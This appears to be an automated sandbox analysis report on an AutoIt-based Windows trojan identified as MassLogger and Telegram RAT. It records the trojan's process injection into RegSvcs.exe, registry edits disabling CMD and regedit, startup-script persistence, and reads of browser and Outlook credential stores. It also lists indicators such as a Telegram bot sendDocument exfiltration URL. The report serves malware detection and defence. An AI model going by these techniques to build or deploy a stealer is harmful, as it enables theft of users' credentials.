Code function: 1_2_001848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_001848D7

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001E4C27 mouse_event,

1_2_001E4C27

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\tNXl4XhgmV.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe "C:\Users\user\AppData\Local\ghauts\vaccinatory.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\ghauts\vaccinatory.exe"	Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001D7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

1_2_001D7CAF

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001D874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_001D874B

Source: tNXl4XhgmV.exe, vaccinatory.exe.1.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: tNXl4XhgmV.exe, vaccinatory.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001A862B cpuid

1_2_001A862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001B4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_001B4E87

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001C1E06 GetUserNameW,

1_2_001C1E06

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001B3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_001B3F3A

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_001849A0

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables CMD prompt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Registry value created: DisableCMD 1

Jump to behavior

Disables the Windows registry editor (regedit)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools

Jump to behavior

Source: tNXl4XhgmV.exe, 00000001.00000003.1282002550.0000000001154000.00000004.00000020.00020000.00000000.sdmp, tNXl4XhgmV.exe, 00000001.00000002.1290136214.00000000011DF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: procmon.exe

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 8052, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 8052, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: vaccinatory.exe	Binary or memory string: WIN_81
Source: vaccinatory.exe	Binary or memory string: WIN_XP
Source: vaccinatory.exe	Binary or memory string: WIN_XPe
Source: vaccinatory.exe	Binary or memory string: WIN_VISTA
Source: vaccinatory.exe	Binary or memory string: WIN_7
Source: vaccinatory.exe	Binary or memory string: WIN_8
Source: vaccinatory.exe.1.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2538612035.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2538888760.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2536490753.0000000000414000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8068, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 8052, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vaccinatory.exe PID: 8052, type: MEMORYSTR

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001F6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	1_2_001F6283
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001F6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	1_2_001F6747
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00836283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	3_2_00836283
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00836747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	3_2_00836747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	2 Native API	111 Scripting	1 Exploitation for Privilege Escalation	211 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	341 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tNXl4XhgmV.exe	49%	Virustotal		Browse
tNXl4XhgmV.exe	66%	ReversingLabs	Win32.Trojan.AutoitInject
tNXl4XhgmV.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	66%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.comX	0%	Avira URL Cloud	safe
http://checkip.dyndns.comP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.48.1	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.comP	RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot-/sendDocume	RegSvcs.exe, 00000004.00000002.2536556876.0000000000413000.00000040.80000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189l	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	vaccinatory.exe, 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2536556876.0000000000413000.00000040.80000000.00040000.00000000.sdmp, vaccinatory.exe, 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.orgd	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189d	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comX	RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot-/sendDocument?chat_id=	vaccinatory.exe, 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	vaccinatory.exe, 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2536556876.0000000000413000.00000040.80000000.00040000.00000000.sdmp, vaccinatory.exe, 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588685
Start date and time:	2025-01-11 04:09:49 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tNXl4XhgmV.exe renamed because original name is a hash value
Original Sample Name:	eb3c77ccbedf21f84a138c9f85ca4a4153e9f8dcd14fe21e5bad8207b72b2fbe.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@16/6@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 54 Number of non-executed functions: 283
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:10:50	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
132.226.247.73	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
reallyfreegeoip.org	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
